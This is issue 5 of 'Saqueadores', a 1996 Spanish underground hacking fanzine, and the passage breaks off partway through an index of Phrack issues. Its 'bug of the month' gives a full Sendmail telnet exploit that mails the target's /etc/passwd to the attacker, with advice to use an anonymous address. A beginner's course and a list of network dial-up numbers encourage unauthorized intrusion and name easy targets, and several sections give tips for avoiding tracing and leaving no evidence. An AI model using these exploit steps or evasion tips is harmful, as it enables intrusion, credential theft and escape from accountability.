浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 SAQUEADORES N5 20-12-96 Segunda Epoca 把陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 Fanzine del underground informatico 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 浜様様様様様様様様様様用様様様様様様様様様様様様様様様様様様様様様様様様様様 Division tecnica Eljaker, Warezzman, El Duke de Sicilia, +Ochodedos... 把陳陳陳陳陳陳陳陳陳陳津陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 Colaboradores SLinK, RoN, RedCool, Valfadir... 把陳陳陳陳陳陳陳陳陳陳津陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 Division comercial Ericx, Warezzman, Red... 麺様様様様様様様様僕様溶様様様様様様様様様様様様様様様様様様様様様様様様様様 Disponible en http://www.geocities.com/SiliconValley/park/7574/ http://iberhack.ml.org http://www.geocities.com/SiliconValley/Park/7479/ 麺様様様様用様様様瞥様様様様様様様様様僕様様様冤様様様様様様様様様様様様様様 E-mail eljaker@hotmail.com Irc #hack, #iberhack, etc... el_duke1@hotmail.com En la red hispana de irc warezzman@geocities.com 藩様様様様溶様様様様様様様様様様様様様瞥様様様詫様様様様様様様様様様様様様様 "If you give a man a crack he'll be hungry again tomorrow, but if you teach him how to crack, he'll never be hungry again" +ORC 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 01. CONTENIDOS 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 N__Titulo/Autor___________________________________Tema_________Nivel tecnico_ 01. Contenidos Saqueadores numero 5 02. Presentacion Saqueadores numero 5 03. El bug del mes / por Red Hackin Medio-alto 04. Curso de hacking empezando desde cero I Hackin Bajo por Eljaker 05. Traceo de llamadas en infovia por el Duke Telefonia Medio-alto 06. Telefonos de algunas redes con numero en Hackin Espaa 07. Indice de la revista Phrack. #40-49 Publicaciones en ingles por el Duke 08. Hackers, phreackers y piratas Opinion 09. Avisos, peticiones, etc... Variado 10. Ser o no ser un hacker? Opinion 11. Despedida Taluego Lucas 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 02. PRESENTACION 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Hola amigos soy el Duke de Sicilia. Eljaker esta un poco liado ultimamente, por eso me han encargado que cordine temporalmente el fanzine. Ademas de este han ocurrido otros cambios. Como habreis notado, el look de la revista ha cambiado bastante. Tenemos nuevos colaboradores y articulistas. Hemos decidido que la revista tendra un caracter democratico, por lo tanto la figura de editor-jefe desaparece, ahora somos un equipo donde nadie manda. Vamos a incluir articulos ideologicos y de opinion. (No os preocuipeis, no pretendemos transformar el fanzine en un folletin politico) Aunque los hackers y crackers pertenezcamos al undergroung, no podemos olvidarnos de lo que pasa hay fuera, el mundo cambia muy deprisa y debemos estar preparados para los cambios, y si es necesario, nosotros mismos nos veremos obligados ha hacer esos cambios. Hay otros cambios menos obvios, de los que ya os ireis dando cuenta poco a poco. el duke de sicilia 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 03. EL BUG DEL MES 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Hola soy el Red Cracker y me han encargado que escriba esta nueva seccion de la revista. (Solo en este numero) La verdad es que mi especialidad no es el hacking por eso el bug del que voy a hablar no es muy espectacular. Ademas es un poco antiguo con lo que seguramente no funcionara en la mayoria de las maquinas. Lo que hace este bug, es permitir que enviando un comando en la linea del sendmail puedas conseguir que el fichero de passwords sea enviado a tu direccion de correo. (Por eso es conveniente usar una direccion anonima para no ser pillado) ------------------------------------------------------------------------------ Sistemas: Unix's en general, espacialmente AIX y SUNOS Versiones: Sendmail, versiones anteriores a la 5.57 Descripcion: Bug del sendmail Ejemplo: en unix o linux saqland % telnet victima.com 25 Trying 128.128.128.1... Connected to victima.com Escape character is '^]'. 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd" 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok rcpt to: loquequieras 550 loquequieras... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. saqland % Ejemplo: Conexion desde DOS o Windows y otros Con un programa de telnet conecta a este url -> victima.com:25 o si se puede configurar en los menus configuralo para que la conexion se haga al puerto 25, que es el del sendmail. 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd" 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok rcpt to: loquequieras 550 loquequieras... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Notas: -victima.com = nombre del ordenador a hackear -saqland = nombre de nuestro ordenador -Lo que aparece con un numero delante son mensajes de nuestra victima, el resto es lo que tienes que escribir. -Aprende a usar bien el programa de telnet, porque es el que mas usaras a la hora de hackear. ------------------------------------------------------------------------------ Red 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 04. CURSO DE HACKING EMPEZANDO DESDE CERO I 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Hola amigos, bienvenidos al maravilloso mundo del hacking. Como estas leyendo esto supongo que tendras muy pocos conocimientos sobre hacking, por eso voy a intentar escribir de la forma mas clara que pueda, aun asi, si os perdeis no teneis mas que mandarme un mensaje y me correjire. Los que esten leyendo esto tambien, pero tengan un poco mas de nivel, pueden seguir leyendo, nunca viene mal repasar los conocimientos basicos. Conceptos basicos: ------------------ Como cualquier aburrido manual de iniciacion que se precie, ahora vienen las definiciones basicas que todo hacker debe saber. Estas definicones, no vienen en ningun diccionario y son muy subjetivas y cambientes, cada uno las interpreta a su manera y su significado varia con el tiempo o segun el contexto. Voy a intentar dar la definicon mas extendida, e intentare explicar todos los posibles significados y variantes: HACKING >> Penetrar en sistemas informaticos ajenos sin su consentimiento, tanto "virtualmente" como fisicamente. (Ej. Entrar en una oficina y robar unos manuales) >> Cualquier accion encaminada a conseguir lo primero; como son la ingenieria social, el trashing, etc... HACKER >> Persona que hace hacking. >> Persona muy habil con los ordenadores. >> Pirata informatico, en cualquiera de sus muchos significados. PIRATA INFORMATICO >> Persona dedicada a la copia y distribucion de software ilegal, tando software comercial crackeado, como shareware registrado, etc... >> Persona que elimina las protecciones software. Mas conocido como cracker. >> Delincuente informatico. CRACKER >> Persona que elimina las protecciones logicas y a veces fisicas del software. >> Hacker malvado. >> Hacker que emplea la fuerza bruta, o metodos que daan el sistema que intenta hackear. CRACKEADOR >> Programa utilizado para sacar los password encriptados de los archivos de passwords. Bien desencriptandolos, cuando se puede, o bien provando multiples convinaciones hasta que encuentra la correcta. INGENIERIA SOCIAL >> Convencer a alguien, por diversos medios, para que nos facilite informacion util para hackear, o para que haga algo que nos beneficie. (No solo al hackear) TRASHING >> (Recogida de basura) Rebuscar en la basura, para encontrar algo que pueda ser util a la hora de hackear. HACKEAR POR FUERZA BRUTA >> No significa nada bestia, ni que necesite mucha fuerza, simplemente es un hacking que necesita mucho esfuerzo, mucho tiempo de proceso o de intentos. Como es probar distintos passwords hasta encontrar el acertado, usar un crackeador, desencriptar un fichero encriptado, sacar las claves de un archivo de passwords usando las palabras de un diccionario, etc.. FICHERO DE PASSWORD >> Fichero en el que el sistema guarda sus claves de acceso. CARDING >> Uso ilegitimo de las tarjetas de credito, o sus numeros, pertenecienes a otras personas. Se relaciona mucho con el hacking, porque para conseguir numeros de tarjetas de creditos, una de las mejores maneras es el hacking. PHREAKING >> Uso del telefono, o de las redes y servicios telefonicos, gratis o con un coste menor del normal. Devido al uso intensivo del telefono por parte de los hackers, es bastante normal que usen el phreackin para ahorrarse unas pelas. >> Modificacion o intervencion de las lineas telefonicas, con otros fines distintos del llamar gratis. BOXING >> Uso de aparatos electronicos o electricos (Boxes) para hacer phreacking. CABALLOS DE TROYA >> Programa que se queda residente en el sistema que pretendemos hackear y que nos facilita informacion sobre lo que pasa en el. >> Un tipo de virus o programa que usa otros programas para introducirse en sistemas ajenos. (Que me perdonen por la definicon tan cutre, los expertos en virus) PINCHADO DE LINEAS / SNIFFING >> Espiar y obtener la informacion que cicula por una red. SNIFFER >> Programa encargado de intercepatar la informacion que circula por la red. TRACEAR >> Seguir la pista a traves de la red a una informacion o a una persona. BUG, AGUJERO, HOLE >> Defecto del software que permite a los hackers introducirse en ordenadores ajenos. EXPLOIT >> Metodo concreto de usar un bug para entrar en un sistema. WAR DIALER, DISCADOR >> Programa que escanea la linea telefonica en busca de modems. PPP, TCP/IP, UDP >> Distintos protocolos de comunicacion, que usan las grandes redes como internet. SUNOS, AIX, HP/UX, IRIX, VMS, UNIX >> Varios sistemas operativos que usan los grandes ordenadores. ADMINISTRADOR, SYSOP, ROOT >> Persona que se encarga del mantenimiento de un sistema informatico, generalmente tienen control total sobre el sistema. BACKDOOR >> Puerta trasera, mecanismo en el software que permite entrar evitando el metodo normal. CORTAFUEGO, FIREWALL, BASTION >> Sistema avanzado de seguridad que impide a personas no acreditadas el acceso al sistema. LOGIN--> Procedimiento de entrar en un sistema. Normas basicas del hacker: -------------------------- Para terminar este primer capitulo voy a dar, tambien algo aburrido y muy repetido por todos los manuales de iniciacion, pero es que es algo imprescindible. Codigo etico y de comportamiento del hacker. 1. Nunca daes algo intencionadamente. Lo unico que conseguiras sera buscarte problemas. 2. Modifica solo lo estrictamente necesario para entrar y para evitar ser localizado, o para poder acceder otras veces. 3. No hackees nunca por venganza ni por intereses personales o economicos. 4. No hackees sistemas pobres que no puedan reponerse de un ataque fuerte. Ni tampoco sistemas muy ricos o grandes que puedan permitirse gastar dinero y tiempo en buscarte. 5. Odia a telefonica pero no te metas con ella. 6. No hackees ordenadores del gobierno. (El gran hermano te observa) Tal vez sean mas emocionantes, pero no olvides que la policia trabaja para ellos. 7. No comentes con nadie, a menos que sea de total confianza, tus azaas. (Los mas grandes hackers de la historia han sido cazados debido a las confesiones de sus novias) 8. Cuando hables en bbs o por internet, procura ser lo mas discreto posible. Todo lo que digas quedara almacenado. 9. Se paranocio. Una da las caracteristicas principales de los mejores hackers es la paranoia. 10. No dejes ningun dato que pueda relacionarse contigo, en los ordenadores que hackees. Y si es posible, ni siquiera "firmes". 11. Estudia mucho antes de lanzarte a la practica. En el proximo numero de esta serie hablare de los lugares mas seguros para empezar, pero mientras tanto, ten en cuenta que eres un total novato, si te encuentras con problemas probablemente, tu aventura acabe antes de empezar. 12. Nunca dejes de estudiar y de aprender nuevas cosas, el mundo de la informatica avanza rapidamente, y es necesario mantener un buen ritmo si no quieres quedarte atras. Algunos de estos consejos te pareceran anticuados y estupuidos, pero la mayoria tienen un doble objetivo. Mantener limpio el maltratado nombre de los hackers y evitarte problemas con la justicia. eljaker 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 05. TRACEO DE LLAMADAS EN INFOVIA 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Los rumores se han confirmado, nos temiamos algo asi de telefonica, pero la realidad supera la ficcion. Con un endiablado sistema, el gran hermano nos tiene cogido por los mismisimos. Ya lo avisabamos en el numero anterior, conociendo nuestra ip* en internet cualquiera puede averiguar el telefono desde donde llamamos. Se acabo el anonimato en internet y peor aun, se acabo el hacking seguro en internet. El proceso es el siguiente, cualquiera con el que te conectes en internet sabra tu direccion ip, con esta direccion se dirige a tu proveedor. En teoria los datos que tiene el proveedor sobre ti son anonimos, pero hay muchas maneras de conseguirlos. Una vez encontrado tu servidor, averiguan que cuenta es la que estas usando, y ya te han pillado. Muchos pensaran, "pues yo uso una cuenta hackeada y nunca me pillarian". Grave error. Aqui es donde esta la verdadera putada de telefonica. Segun hemos averiguado por fuentes fiables, al conectar con tu servidor por infovia, a tu proveedor no solo le llegan tu login y tu password, sino que tambien se envia tu caller-id*, conociendo tu caller-id conocen el numero del telefono desde el que llamas y entonces te localizan sin remedio. Ademas de este control, telefonica ha colocado aun mas paranoicos, controles de seguridad en infovia, como contabilizacion de las veces que llamas en un dia, impiden el acceso libre entre servidores en infovia obligando a pasar por sus menus, etc... La mayoria creen en el anonimato en internet, pero esto es una burda mentira, el anonimato no existe, porque el gran hermano te esta observnado. NOTAS TECNICAS: --------------- *IP-->Es tu direccion en una red tcp-ip*, y es necesaria para el intercambio de datos. *TCP-IP-->La red internet funciona bajo el protocolo de comunicacion tcp-ip, este protocolo se basa en envios de paquetes de datos, desde el servidor hasta el cliente. Devido a esta estructura, con cualquier ordenador que te conectes, intercambiaras paquetes, y para que esos paquetes puedan llegar a su destino, ambos deben conocer la ip, del otro, con lo cual es muy dificil quedar en anonimato, a menos que uses un tipo de ip-spoofing*. *IP-SPOOFING-->Es una tecnica, por la cual, el ordenador con el que estas conectado no conoce tu verdadera ip, sino que recibe otra. Se ha mitificado mucho, y en realidad tampoco es nada raro. (Aunque si es dificil hacerlo) Por ejemplo, usar un proxy, es un tipo de ip-spoofing, ya que los ordenadores con los que conectes a traves del proxy, recibiran la ip, de este y no la tuya. *CALLER-ID-->Es la informacion sobre tu llamada, que recibe la persona a la que estas llamando. Contiene la informacion de tu area (la centrlaita* que te corresponde) y el numero de telefono desde donde llamas. Si el telefono al que llamas esta preparado para detectar tu caller-id, ese numero aparecera en su display incluso antes de descolgar. (Los que tengan un modelo moderno de telefono movil, sabran de que hablo) Con lo cual se acabo tu anonimato. Parece ser que los ordenadores de infovia, estan preparados para pasar esta informacion, automaticamnte a tu servidor. Esto en teoria sirve para evitar las estafas a los proveedores y que mas de una persona use la misma cuenta, pero esto es una excusa. Varios de nosotros hemos comprobado que en la mayoria de los servidores (arrakis, ctv, etc...) es posible que varias personas a la vez puedan usar la misma cuenta, sin preocuparse. En realidad este sistema es otra de las estrategias de telefonica para coartar nuestra libertad y nuestro anonimato. *CENTRALITA--> Mas o menos cuando haces una llamada pasa esto: 1. Descuelgas y marcas un numero. 2. Tu centralita, recibe este numero y dependiendo de varias cosas, como son el prefijo que hayas marcado, el tipo de llamada*, el tipo de centralita*, etc... establecera una conexion u otra. En este ejemplo, vamos a suponer que la centralita conecta directamnete con la centralita de la persona a la que llamas y le envia el numero de la persona y tu caller-id. 3. Esta segunda centralita manda las seales de llamada a su telefono, y tu caller-id. (Inlcuso antes de descolgar el telefono saben quien llama) 4. La persona descuelga el telefono y la conexion se establece. *TIPO DE LLAMADA--> Si la llamada es interproviancial o internacional, tu llamada pasara por una o varias centralitas intermedias mas, y si tu centralita coincide con la del llamado no es necesario pasar por otra centalita. (Esto se nota mucho, porque la llamada es muy rapida y porque el volumen se oye mas alto que el normal) *TIPOS DE CENTRALITAS--> Hay varios modelos de centralitas, pero para simplificar vamos a agruparlos en dos tipos: a) Las centralitas analogicas, estas son las mas antiguas y progresivamente las van cambiando por las nuevas. Estas centralitas se reconocen, porque la marcacion es por pulsos (La que usaban los telefonos antiguos en los que habia que girar con el dedo una rueda numerada, y cada numero suena como un tictictictic) Aunque hay algunas centralitas analogicas que tambien aceptan marcacion por tonos. Debido a la antigua tecnologia de estas centralitas, la informacion sobre el caller-id, no se envia, aun asi, es relativamnte facil tracear la llamada. b) Centralitas digitales, estas son mas nuevas, y se reconocen porque la maracion se realiza por tonos. (La tipica marcacion, en la que a cada numero le corresponde un solo bip) Estas centralitas son de tecnologia mas moderna y ademas de enviar tu caller-id, tambien hacen un completo registro de tu llamada, con lo cual, aunque la persona no disponga de display para ver el caller-id, puede llegar a ti sin muchos problemas. Permiten todos los servios nuevos que ha creado telefonica, como el devios de llamadas, la llamada a tres, la llamada anonima*, etc... *LLAMADA ANONIMA--> Uno de los nuevos servicios de telefonica, es la posibilidad de evitar que tu caller-id sea enviado, mediante la marcacion de un codigo especial antes de llamar. Este codigo esta siendo investigado por nuestro equipo y posiblemente sea el sujeto de uno de nuestros nuevos expedientes secretos. Aun asi, el telefono al que llameis puede que no acepte llamadas anonimas, con lo que el truco no servira. La conclusion es que hay que andarse con mucho cuidado de ahora en adelante, con lo que se hace en internet. Como decia un famoso hacker: "Solo los hackers paronicos consiguen continuar cuando han cumplido mas de 21 aos" el duke de sicilia 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 06. TELEFONOS DE ALGUNAS REDES CON NUMERO EN ESPAA 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Los lugares calsicos de hackeo son las grandes redes, por eso he recopilado en este articulo, los numeros de las redes mas importantes que ofrecen sus servicios en nuestro pais. Son pocas comparadas con las que operan en Estados unidos, pero algo es algo. Nodo | Ciudad | Terminal | BPS | Numero | Red ----------------------------------------------------------------- 6670 | BARCELONA | E71 | 2400 | (93)4155082 | TYMNET | BARCELONA | E71 | 9600 | (93)4156518 | TYMNET 6726 | BILBAO | E71 | 2400 | (94)4276492 | TYMNET 06726 | BILBAO | E71 | 9600 | (94)4411500 | TYMNET 13643 | MADRID | E71 | 2400 | (91)3026006 | TYMNET | MADRID | E71 | 9600 | (91)3830918 | TYMNET 04535 | MADRID | E71 | 9600 | (91)7661144 | TYMNET | TODAS | E71 | 9600 | 047 | IBERPAC | TODAS | E71 | 9600 | 048 | IBERPAC | TODAS | E71 | 14400 | 041 | IBERPAC | TODAS | E71 | 14400 | 042 | IBERPAC | BILBAO | E71 | 1200 | (94)4419262 | IBERPAC | MADRID | E71 | 1200 | (91)4582241 | IBERPAC | TODAS | E71 | 2400 | 090 | DATAPAC | MADRID | E71 | 2400 | (91)3591951 | COMPUSERVE | BARCELONA | E71 | 2400 | (93)4123282 | COMPUSERVE | BILBAO | 8N1 VT100 | 1200 | (94)4209444 | SPRITEL | BILBAO | 8N1 VT100 | 1200 | (94)5134048 | SPRITEL | BILBAO | 8N1 VT100 | 1200 | (94)3470044 | SPRITEL | TODAS | PPP | 28800 | 050 | INFOVIA | TODAS | CEPT-1 | 9600 | 030 | IBERTEX | TODAS | CEPT-1 | 2400 | 031 | IBERTEX | TODAS | CEPT-1 | 2400 | 032 | IBERTEX | TODAS | CEPT-1 | 2400 | 033 | IBERTEX | TODAS | CEPT-1 | 2400 | 034 | IBERTEX | TODAS | CEPT-1 | 2400 | 035 | IBERTEX | TODAS | CEPT-1 | 2400 | 036 | IBERTEX Observaciones: -A ver quien consigue conectar decentemente con el 090, lo hemos intentado de infinidad de maneras y nada. :-? -Aunque algunas redes parezcan muy poco propicias para el hacking, esto solo es una apariencia. #Por ejemplo ibertex es un sitio ideal (Aunque caro) de empezar a hackear. Tiene un sistema de seguridad muy escaso y antiguo, cualquier hacker que se precie puede conseguir algo. #Infovia, al ser un sistema nuevo, tambien es facil de hackear, ya que tiene muchos agujeros inexplorados. Aunque andaros con cuidado, que jugar con la telefonica es peligroso. (El gran hermano te observa) -Algunos datos estan ya anticuados, y otros no han sido comprobados, por favor que alguien compruebe los datos y nos envie los resulatados actualizados. Esto de vivir lejos de las grandes ciudades es un poco molesto a la hora de divertirse. :-) AVISO: La mayoria de estas redes tienen fuertes medidas de seguridad, a si que llevaros cuidado. Aunque su hackeo este muy bien documentado como en el caso de la red datapac o la red tymnet, estos numeros de telefono tienen activado la deteccion del caller-id, esto quiere decir que nada mas llamar saben el numero del telefono desde el que estais llamando. A menos que useis un telefono realmente limpio, os aconsejaria que os andaseis con cuidado. PETICION: Si alguien conoce el numero de telefono de otras redes, que por favor, nos los envie, para que podamos publicarlo en un proximo numero. 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 07. Indice de la revista Phrack. Numeros 40 al 49 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Aunque nuestra publicacion es en espaol, no podemos olvidar a Phrack la revista electronica sobre hacking en ingles mas famosa del mundo (Despues de la nuestra :-) y la que muchos piensan que es la mejor. Por eso hemos decidido hacer un indice de los numeros mas actuales, los ultimos 9 numeros aparecidos de esta revista. Datos sobre la revista: ----------------------- Phrack Magazine 603 W. 13th #1A-278 (Direccion de correo) Austin, TX 78701 ftp.fc.net (FTP) /pub/phrack http://www.fc.net/phrack (WWW) phrack@well.com (Direccion e-mail) Indice: ------- * Los articulos con un asterisco son de recomendada lectura. (Cortesia de el duke) -= Phrack 40 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by Dispater 06K 2. Phrack Loopback by Dispater and Mind Mage 50K 3. Phrack Pro-Phile on Lex Luthor by Taran King 36K 4. Network Miscellany by The Racketeer [HFC] 32K 5. Pirates Cove by Rambone 57K 6 Cellular Telephony, Part II by Brian Oblivion * 72K 7. The Fine Art of Telephony by Crimson Flash * 65K 8. BT Tymnet, Part 1 of 3 by Toucan Jones 57K 9. BT Tymnet, Part 2 of 3 by Toucan Jones 55K 10. BT Tymnet, Part 3 of 3 by Toucan Jones 91K 11. SummerCon 1992 by Knight Lightning and Dispater 35K 12. PWN/Part 1 by Datastream Cowboy 50K 13. PWN/Part 2 by Datastream Cowboy 48K 14. PWN/Part 3 by Datastream Cowboy 48K Total: 702K -= Phrack 41 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by Dispater 07K 2. Phrack Loopback by Dispater and Mind Mage 52K 3. Phrack Pro-Phile on Supernigger 10K 4. Network Miscellany by The Racketeer [HFC] 35K 5. Pirates Cove by Rambone 32K 6 Hacking AT&T System 75 by Scott Simpson 20K 7. How To Build a DMS-10 Switch by The Cavalier 23K 8. TTY Spoofing by VaxBuster * 20K 9. Security Shortcomings of AppleShare Networks by Bobby Zero 16K 10. Mall Cop Frequencies by Caligula XXI 11K 11. PWN/Part 1 by Datastream Cowboy 46K 12. PWN/Part 2 by Datastream Cowboy 49K 13. PWN/Part 3 by Datastream Cowboy 43K Total: 364K -= Phrack 42 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 14K 2. Phrack Loopback / Editorial Page / Line Noise 48K 3. Phrack Pro-Phile on Lord Digital 22K 4. Packet Switched Network Security by Chris Goggans 22K 5 Tymnet Diagnostic Tools by Professor Falken 35K 6. A User's Guide to XRAY by NOD 11K 7. Useful Commands for the TP3010 Debug Port by G. Tenet 28K 8. Sprintnet Directory Part I by Skylar 49K 9. Sprintnet Directory Part II by Skylar 45K 10. Sprintnet Directory Part III by Skylar 46K 11. Guide to Encryption by The Racketeer [HFC] 32K 12. The Freedom Of Information Act and You by Vince Niel 42K 13. HoHoCon from Various Sources 51K 14. PWN by Datastream Cowboy 29K Total: 474K -= Phrack 43 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 24K 2. Phrack Loopback Part I 38K 3. Phrack Loopback Part II / Editorial 44K 4. Line Noise Part I 39K 5. Line Noise Part II 43K 6. Phrack Pro-Phile on Doctor Who 15K 7. Conference News Part I by Various Sources 53K 8. Conference News Part II by Various Sources 58K 9. How To Hack Blackjack (Part I) by Lex Luthor 52K 10. How To Hack Blackjack (Part II) by Lex Luthor 50K 11. Help for Verifying Novell Security by Phrack Staff * 48K 12. My Bust (Part I) by Robert Clark * 56K 13. My Bust (Part II) by Robert Clark * 55K 14. Playing Hide and Seek, Unix Style by Phrack Accident 31K 15. Physical Access and Theft of PBX Systems by Co/Dec 28K 16. Guide to the 5ESS by Firm G.R.A.S.P. * 63K 17. Cellular Info by Madjus (N.O.D.) * 47K 18. LODCOM BBS Archive Information 24K 19. LODCOM Sample Messages 52K 20. Step By Step Guide To Stealing a Camaro by Spy Ace 21K 21. Acronyms Part I by Firm G.R.A.S.P. 50K 22. Acronyms Part II by Firm G.R.A.S.P. 51K 23. Acronyms Part III by Firm G.R.A.S.P. 45K 24. Acronyms Part IV by Firm G.R.A.S.P. 52K 25. Acronyms Part V by Firm G.R.A.S.P. 46K 26. International Scene by Various Sources 51K 27. Phrack World News by Datastream Cowboy 24K Total: 1152K -= Phrack 44 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 16K 2. Phrack Loopback / Editorial 57K 3. Line Noise Part I 51K 4. Line Noise Part II 35K 5. Computer Cop Prophile by The Grimmace 22K 6. Conference News Part I by Various Sources 55K 7. Conference News Part II by Various Sources 35K 8. Conference News Part III by Various Sources 50K 9. Intro to Packet Radio by Larry Kollar * 16K 10. The Moeller Papers 30K 11. Sara Gordon v. Kohntark Part I 12K 12. Sara Gordon v. Kohntark Part II 47K 13. Northern Telecom's FMT-150B/C/D by FyberLyte 16K 14. A Guide to Data General's AOS/VS Part I by Herd Beast 46K 15. A Guide to Data General's AOS/VS Part II by Herd Beast 50K 16. An Interview With Agent Steal by Agent 005 14K 17. Visionary - The Story About Him by Visionary 23K 18. Searching The Dialog Information Service by Al Capone 48K 19. Northern Telecom's SL-1 by Iceman 30K 20. Safe and Easy Carding by VaxBuster 18K 21. Datapac by Synapse 36K 22. An Introduction to the Decserver 200 By Opticon 16K 23. LOD Communications BBS Archive Information 29K 24. MOD Family Portrait 35K 25. Gail Takes A Break 49K 26. International Scenes by Various Sources 25K 27. Phrack World News by Datastream Cowboy 22K Total: 882K -= Phrack 45 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 17K 2. Phrack Loopback Part I 31K 3. Phrack Loopback Part II / Editorial 40K 4. Line Noise Part I 49K 5. Line Noise Part II 50K 6. Line Noise Part III 59K 7. Phrack Prophile on Control C 22K 8. Running a BBS on X.25 by Seven Up 15K 9. No Time for Goodbyes by Emmanuel Goldstein 21K 10. Security Guidelines * 55K 11. Ho Ho Con Miscellany by Various Sources 32K 12. Quentin Strikes Again by The Omega and White Knight 28K 13. 10th Chaos Computer Congress by Manny E. Farber 23K 14. Defcon II information 26K 15. VMS Information by Various Sources 34K 16. DCL BBS PROGRAM by Raoul 23K 17. Hollywood-Style Bits & Bytes by Richard Goodwin 50K 18. Fraudulent Applications of 900 Services by Co/Dec 15K 19. Screwing Over Your Local McDonald's by Charlie X 20K 20. The Senator Markey Hearing Transcripts 72K 21. The Universal Data Converter by Maldoror 45K 22. BOX.EXE - Box Program for Sound Blaster by The Fixer 13K 23. Introduction To Octel's ASPEN by Optik Nerve 12K 24. Radio Free Berkeley Information 35K 25. The MCX7700 PABX System by Dr. Delam 22K 26. Cellular Debug Mode Commands by Various Sources * 13K 27. International Scenes by Various Sources 63K 28. Phrack World News by Datastream Cowboy 17K Total: 902K -= Phrack 46 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 17K 2. Phrack Loopback / Editorial 52K 3. Line Noise 61K 4. Line Noise 56K 5. Phrack Prophile on Minor Threat 12K 6. Paid Advertisement 62K 7. Paid Advertisement (cont) 45K 8. The Wonderful World of Pagers by Erik Bloodaxe 24K 9. Legal Info by Szechuan Death 13K 10. A Guide to Porno Boxes by Carl Corey 13K 11. Unix Hacking - Tools of the Trade by The Shining 42K 12. The fingerd Trojan Horse by Hitman Italy * 32K 13. The Phrack University Dialup List 12K 14. A Little About Dialcom by Herd Beast 29K 15. VisaNet Operations Part I by Ice Jey 50K 16. VisaNet Operations Part II by Ice Jey 44K 17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25K 18. Startalk by The Red Skull 21K 19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45K 20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42K 21. The Groom Lake Desert Rat by PsychoSpy 44K 22. HOPE by Erik Bloodaxe 51K 23. Cyber Christ Bites the Big Apple by Winn Schwartau 60K 24. The ABCs of Better Hotel Staying by Seven Up 12K 25. AT&T Definity System 75/85 by Erudite 13K 26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35K 27. International Scenes by Various Sources 44K 28. Phrack World News by Datastream Cowboy 38K Total: 996K -= Phrack 47 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 16K 2. Phrack Loopback / Editorial 52K 3. Line Noise 59K 4. Line Noise 65K 5. The #hack FAQ (Part 1) by Voyager * 39K 6. The #hack FAQ (Part 2) by Voyager * 38K 7. The #hack FAQ (Part 3) by Voyager * 51K 8. The #hack FAQ (Part 4) by Voyager * 47K 9. DEFCon Information 28K 10. HoHoCon by Netta Gilboa 30K 11. HoHoCon by Count Zero 33K 12. HoHo Miscellany by Various Sources 33K 13. An Overview of Prepaid Calling Cards by Treason 29K 14. The Glenayre GL3000 Paging and Voice Retrieval System by Armitage 25K 15. Complete Guide to Hacking Meridian Voice Mail by Substance 10K 16. DBS Primer from American Hacker Magazine 45K 17. Your New Windows Background (Part 1) by The Man 39K 18. Your New Windows Background (Part 2) by The Man 46K 19. A Guide To British Telecom's Caller ID Service by Dr. B0B 31K 20. A Day in The Life of a Warez Broker by Xxxx Xxxxxxxx 13K 21. International Scenes by Various Sources 40K 22. Phrack World News by Datastream Cowboy 38K Total: 808K -= Phrack 48 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by the Editorial Staff 13K 2. Phrack Loopback / Editorial 55K 3. Line Noise (Part I) 63K 4. Line Noise (Part II) 51K 5. Phrack Pro-Philes on the New Editors 23K 6. Motorola Command Mode Information by Cherokee * 38K 7. Tandy / Radio Shack Cellular Phones by Damien Thorn 43K 8. The Craft Access Terminal by Boss Hogg 36K 9. Information About NT's FMT-150/B/C/D by StaTiC 22K 10. Electronic Telephone Cards (Part I) 39K 11. Electronic Telephone Cards (Part II) 66K 12. Keytrap Revisited by Sendai 13K 13. Project Neptune by Daemon9 52K 14. IP-Spoofing Demystified by Daemon9 * 25K 15. Netmon by Daemon9 21K 16. The Truth...and 